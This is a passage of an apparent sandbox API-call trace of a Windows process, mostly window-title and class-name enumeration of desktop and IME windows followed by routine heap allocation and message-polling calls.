hWnd=0x10074, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0139.485] GetWindowTextW (in: hWnd=0x10022, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0139.486] GetClassNameW (in: hWnd=0x10022, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0139.486] GetWindowTextW (in: hWnd=0x2002a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.486] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0139.486] GetWindowTextW (in: hWnd=0x3035e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.486] GetClassNameW (in: hWnd=0x3035e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0139.487] GetWindowTextW (in: hWnd=0x100d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0139.487] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0139.487] GetWindowTextW (in: hWnd=0x1012a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.487] GetClassNameW (in: hWnd=0x1012a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.487] GetWindowTextW (in: hWnd=0x100ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0139.488] GetClassNameW (in: hWnd=0x100ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0139.488] GetWindowTextW (in: hWnd=0x10082, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.488] GetClassNameW (in: hWnd=0x10082, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.488] GetWindowTextW (in: hWnd=0xb031c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.488] GetClassNameW (in: hWnd=0xb031c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.488] GetWindowTextW (in: hWnd=0x601d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.489] GetClassNameW (in: hWnd=0x601d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.489] GetWindowTextW (in: hWnd=0x103a0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.489] GetClassNameW (in: hWnd=0x103a0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.489] GetWindowTextW (in: hWnd=0x1039e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.489] GetClassNameW (in: hWnd=0x1039e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.489] GetWindowTextW (in: hWnd=0x1039c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.490] GetClassNameW (in: hWnd=0x1039c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.490] GetWindowTextW (in: hWnd=0x1039a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.490] GetClassNameW (in: hWnd=0x1039a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.490] GetWindowTextW (in: hWnd=0x20224, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.490] GetClassNameW (in: hWnd=0x20224, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.491] GetWindowTextW (in: hWnd=0x10398, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.491] GetClassNameW (in: hWnd=0x10398, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.491] GetWindowTextW (in: hWnd=0x10394, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.491] GetClassNameW (in: hWnd=0x10394, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.491] GetWindowTextW (in: hWnd=0x10392, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.492] GetClassNameW (in: hWnd=0x10392, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.492] GetWindowTextW (in: hWnd=0x10390, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.492] GetClassNameW (in: hWnd=0x10390, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.492] GetWindowTextW (in: hWnd=0x10388, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.493] GetClassNameW (in: hWnd=0x10388, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.493] GetWindowTextW (in: hWnd=0x10386, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.493] GetClassNameW (in: hWnd=0x10386, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.494] GetWindowTextW (in: hWnd=0x10384, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.494] GetClassNameW (in: hWnd=0x10384, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.494] GetWindowTextW (in: hWnd=0x10382, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.494] GetClassNameW (in: hWnd=0x10382, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.495] GetWindowTextW (in: hWnd=0x2021a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.495] GetClassNameW (in: hWnd=0x2021a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.495] GetWindowTextW (in: hWnd=0x10380, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.495] GetClassNameW (in: hWnd=0x10380, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.495] GetWindowTextW (in: hWnd=0x1037e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.496] GetClassNameW (in: hWnd=0x1037e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.582] GetWindowTextW (in: hWnd=0x1037c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.583] GetClassNameW (in: hWnd=0x1037c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.583] GetWindowTextW (in: hWnd=0x1037a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.583] GetClassNameW (in: hWnd=0x1037a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.583] GetWindowTextW (in: hWnd=0x10378, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.583] GetClassNameW (in: hWnd=0x10378, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.583] GetWindowTextW (in: hWnd=0x10376, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.584] GetClassNameW (in: hWnd=0x10376, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.584] GetWindowTextW (in: hWnd=0x10374, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.584] GetClassNameW (in: hWnd=0x10374, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.584] GetWindowTextW (in: hWnd=0x10372, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.585] GetClassNameW (in: hWnd=0x10372, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.585] GetWindowTextW (in: hWnd=0x10370, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.585] GetClassNameW (in: hWnd=0x10370, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.585] GetWindowTextW (in: hWnd=0x1036e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.585] GetClassNameW (in: hWnd=0x1036e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.585] GetWindowTextW (in: hWnd=0x1036c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.586] GetClassNameW (in: hWnd=0x1036c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.586] GetWindowTextW (in: hWnd=0x10368, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.586] GetClassNameW (in: hWnd=0x10368, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.586] GetWindowTextW (in: hWnd=0x10362, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.586] GetClassNameW (in: hWnd=0x10362, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.587] GetWindowTextW (in: hWnd=0x10360, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.587] GetClassNameW (in: hWnd=0x10360, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.587] GetWindowTextW (in: hWnd=0x1035a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.587] GetClassNameW (in: hWnd=0x1035a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.587] GetWindowTextW (in: hWnd=0x10358, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.588] GetClassNameW (in: hWnd=0x10358, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.588] GetWindowTextW (in: hWnd=0x10356, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.588] GetClassNameW (in: hWnd=0x10356, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.588] GetWindowTextW (in: hWnd=0x10354, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.588] GetClassNameW (in: hWnd=0x10354, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.588] GetWindowTextW (in: hWnd=0x10352, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.589] GetClassNameW (in: hWnd=0x10352, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.589] GetWindowTextW (in: hWnd=0x10350, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.589] GetClassNameW (in: hWnd=0x10350, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.589] GetWindowTextW (in: hWnd=0x1034e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.589] GetClassNameW (in: hWnd=0x1034e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.589] GetWindowTextW (in: hWnd=0x1034c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.590] GetClassNameW (in: hWnd=0x1034c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.590] GetWindowTextW (in: hWnd=0x1034a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.590] GetClassNameW (in: hWnd=0x1034a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.590] GetWindowTextW (in: hWnd=0x10348, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.590] GetClassNameW (in: hWnd=0x10348, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.590] GetWindowTextW (in: hWnd=0x10346, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.591] GetClassNameW (in: hWnd=0x10346, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.591] GetWindowTextW (in: hWnd=0x20216, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.591] GetClassNameW (in: hWnd=0x20216, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.591] GetWindowTextW (in: hWnd=0x1033c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.591] GetClassNameW (in: hWnd=0x1033c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.591] GetWindowTextW (in: hWnd=0x10334, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.592] GetClassNameW (in: hWnd=0x10334, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.592] GetWindowTextW (in: hWnd=0x10326, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.592] GetClassNameW (in: hWnd=0x10326, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.592] GetWindowTextW (in: hWnd=0x1030e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.592] GetClassNameW (in: hWnd=0x1030e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.593] GetWindowTextW (in: hWnd=0x1030c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.593] GetClassNameW (in: hWnd=0x1030c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.593] GetWindowTextW (in: hWnd=0x1030a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.593] GetClassNameW (in: hWnd=0x1030a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.593] GetWindowTextW (in: hWnd=0x10312, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.593] GetClassNameW (in: hWnd=0x10312, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.593] GetWindowTextW (in: hWnd=0x20208, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.594] GetClassNameW (in: hWnd=0x20208, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.594] GetWindowTextW (in: hWnd=0x1027a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.594] GetClassNameW (in: hWnd=0x1027a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.595] GetWindowTextW (in: hWnd=0x10278, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.595] GetClassNameW (in: hWnd=0x10278, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.595] GetWindowTextW (in: hWnd=0x10276, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.595] GetClassNameW (in: hWnd=0x10276, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.595] GetWindowTextW (in: hWnd=0x10274, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.595] GetClassNameW (in: hWnd=0x10274, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.596] GetWindowTextW (in: hWnd=0x20202, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.596] GetClassNameW (in: hWnd=0x20202, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.596] GetWindowTextW (in: hWnd=0x10272, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.596] GetClassNameW (in: hWnd=0x10272, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.598] GetWindowTextW (in: hWnd=0x10270, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.598] GetClassNameW (in: hWnd=0x10270, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.598] GetWindowTextW (in: hWnd=0x1026e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.598] GetClassNameW (in: hWnd=0x1026e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.599] GetWindowTextW (in: hWnd=0x1025e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.599] GetClassNameW (in: hWnd=0x1025e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.599] GetWindowTextW (in: hWnd=0x10250, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.599] GetClassNameW (in: hWnd=0x10250, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.599] GetWindowTextW (in: hWnd=0x1024a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.600] GetClassNameW (in: hWnd=0x1024a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.600] GetWindowTextW (in: hWnd=0x10248, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.600] GetClassNameW (in: hWnd=0x10248, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.600] GetWindowTextW (in: hWnd=0x10246, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.600] GetClassNameW (in: hWnd=0x10246, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.600] GetWindowTextW (in: hWnd=0x10238, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.601] GetClassNameW (in: hWnd=0x10238, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.601] GetWindowTextW (in: hWnd=0x10228, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.601] GetClassNameW (in: hWnd=0x10228, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.601] GetWindowTextW (in: hWnd=0x10220, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.601] GetClassNameW (in: hWnd=0x10220, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.602] GetWindowTextW (in: hWnd=0x1021c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.602] GetClassNameW (in: hWnd=0x1021c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.602] GetWindowTextW (in: hWnd=0x10212, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.602] GetClassNameW (in: hWnd=0x10212, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.602] GetWindowTextW (in: hWnd=0x10210, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.603] GetClassNameW (in: hWnd=0x10210, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.603] GetWindowTextW (in: hWnd=0x40194, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.603] GetClassNameW (in: hWnd=0x40194, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.603] GetWindowTextW (in: hWnd=0x101c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.603] GetClassNameW (in: hWnd=0x101c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.604] GetWindowTextW (in: hWnd=0x101a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.604] GetClassNameW (in: hWnd=0x101a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.604] GetWindowTextW (in: hWnd=0x10190, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.604] GetClassNameW (in: hWnd=0x10190, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.605] GetWindowTextW (in: hWnd=0x100f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0139.605] GetClassNameW (in: hWnd=0x100f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0139.605] GetWindowTextW (in: hWnd=0x100f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.605] GetClassNameW (in: hWnd=0x100f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.606] GetWindowTextW (in: hWnd=0x100e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.606] GetClassNameW (in: hWnd=0x100e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.606] GetWindowTextW (in: hWnd=0x100dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.606] GetClassNameW (in: hWnd=0x100dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.607] GetWindowTextW (in: hWnd=0x401ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.607] GetClassNameW (in: hWnd=0x401ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.607] GetWindowTextW (in: hWnd=0x2003c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.607] GetClassNameW (in: hWnd=0x2003c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.607] GetWindowTextW (in: hWnd=0x101ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.608] GetClassNameW (in: hWnd=0x101ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.611] GetWindowTextW (in: hWnd=0x10076, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0139.611] GetClassNameW (in: hWnd=0x10076, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0139.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e90 | out: hHeap=0x12c0000) returned 1 [0139.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6dd0 | out: hHeap=0x12c0000) returned 1 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e30 | out: hHeap=0x12c0000) returned 1 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e78 | out: hHeap=0x12c0000) returned 1 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e60 | out: hHeap=0x12c0000) returned 1 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff78 | out: hHeap=0x12c0000) returned 1 [0139.612] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0139.612] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0139.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0139.612] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0139.613] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0139.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0139.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0139.613] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0139.613] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0139.614] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0139.614] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.615] 